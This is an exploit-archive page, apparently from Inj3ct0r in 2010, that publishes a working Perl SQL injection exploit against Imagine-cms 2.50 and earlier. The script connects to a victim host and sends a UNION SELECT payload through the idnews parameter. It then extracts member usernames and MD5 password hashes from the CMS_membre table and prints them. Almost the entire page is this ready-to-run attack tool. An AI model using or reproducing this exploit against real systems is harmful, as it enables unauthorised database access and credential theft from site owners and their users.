Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability
Posted on 21 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================= Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability ======================================================= #!/usr/bin/perl ########################################### # # Script Name : Imagine-cms 2.50 # # Version : 2.50 # # Bug Type : SQL Injection # # Found by : Metropolis # # Home : http://metropolis.fr.cr # # Discovered : 21/07/2010 # # Download app : # http://www.imagine-cms.net/modules/ # telechargement/index.php?page=afficher_souscat&id_cat=2 # ########################################### use IO::Socket; if(@ARGV != 2) { usage(); } else { exploit(); } sub header() { print " - Author: Metropolis "; print "- Imagine-cms <= 2.50 Remote SQL Injection Exploit "; } sub usage() { header(); print "- Usage: $0 <host> <path> "; print "- <host> -> Victim's host ex: www.victim.com "; print "- <path> -> ex: / "; exit(); } sub exploit () { #Our variables... $spserver = $ARGV[0]; $spserver =~ s/(http://)//eg; $sphost = "http://".$spserver; $spdir = $ARGV[1]; $spport = "80"; $sptar = "index.php?page=commentaire&idnews="; $spxp = "-1+and+1=0+union+select+1,2,concat(25552,membre_pseudo,25553,membre_mdp,25554),4,5+from+CMS_membre--"; $spreq = $sphost.$spdir.$sptar.$spxp; #Sending data... header(); print "- Trying to connect: $spserver "; $sp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$spserver", PeerPort => "$spport") || die "- Connection failed... "; print $sp "GET $spreq HTTP/1.1 "; print $sp "Accept: */* "; print $sp "Referer: $sphost "; print $sp "Accept-Language: tr "; print $sp "User-Agent: NukeZilla "; print $sp "Cache-Control: no-cache "; print $sp "Host: $spserver "; print $sp "Connection: close "; print "- Connected... "; while ($answer = <$sp>) { if ($answer =~ /25552(.*?)25553([d,a-f]{32})25554/) { print "- Exploit succeed! "; print "- Username: $1 "; print "- MD5 HASH of PASSWORD: $2 "; exit(); } } #Exploit failed... print "- Exploit failed " } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
